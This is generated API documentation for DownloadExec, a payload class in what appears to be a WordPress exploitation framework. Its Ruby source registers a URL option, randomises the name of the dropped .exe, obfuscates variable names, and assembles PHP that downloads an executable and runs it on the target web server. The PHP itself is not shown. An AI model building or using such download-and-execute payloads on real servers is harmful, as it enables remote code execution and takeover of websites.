Class: Wpxf::Payloads::DownloadExec

Inherits:

Wpxf::Payload

• Object
• Wpxf::Payload
• Wpxf::Payloads::DownloadExec

Includes:

Wpxf

Defined in:

lib/wpxf/payloads/download_exec.rb

Overview

Downloads an executable and runs it in the context of the web server.

Instance Attribute Summary

Attributes inherited from Wpxf::Payload

#queued_commands

Attributes included from Options

#datastore, #options

Instance Method Summary

• #constants ⇒ Object
• #generate_php_vars ⇒ Object
• #initialize ⇒ DownloadExec constructor

  A new instance of DownloadExec.

• #obfuscated_variables ⇒ Object
• #raw ⇒ Object

Methods included from Wpxf

app_path, build_module_list, change_stdout_sync, custom_modules_path, data_directory, databases_path, gemspec, home_directory, load_custom_modules, load_module, modules_path, payloads_path, version

Methods inherited from Wpxf::Payload

#check, #cleanup, #encoded, #enqueue_command, #escape_single_quotes, #generate_vars, #php_preamble, #post_exploit, #prepare, #random_var_name

Methods included from Options

#all_options_valid?, #get_option, #get_option_value, #missing_options, #normalized_option_value, #option_valid?, #option_value?, #register_advanced_options, #register_evasion_options, #register_option, #register_options, #scoped_option_change, #set_option_value, #unregister_option, #unset_option

Constructor Details

#initialize ⇒ DownloadExec

Returns a new instance of DownloadExec.

# File 'lib/wpxf/payloads/download_exec.rb', line 8

def initialize
  super

  register_options([
    StringOption.new(
      name: 'executable_url',
      required: true,
      desc: 'The URL to download the executable file from'
    )
  ])
end

Instance Method Details

#constants ⇒ Object

# File 'lib/wpxf/payloads/download_exec.rb', line 31

def constants
  {
    'executable_url' => datastore['executable_url'],
    'exename' => "#{Utility::Text.rand_alpha(rand(5..10))}.exe"
  }
end

#generate_php_vars ⇒ Object

# File 'lib/wpxf/payloads/download_exec.rb', line 20

def generate_php_vars
  generate_vars([
    :cmd, :disabled, :handle, :output, :pipes, :fp,
    :tempfile, :fname, :fd_in, :fd_out
  ])
end

#obfuscated_variables ⇒ Object

# File 'lib/wpxf/payloads/download_exec.rb', line 27

def obfuscated_variables
  super + ['cmd', 'tempfile', 'fname', 'fd_in', 'fd_out', 'output', 'executable_url', 'exename']
end

#raw ⇒ Object

# File 'lib/wpxf/payloads/download_exec.rb', line 38

def raw
  "#{DataFile.new('php', 'exec_methods.php').php_content}"\
  "#{DataFile.new('php', 'download_exec.php').php_content}"
end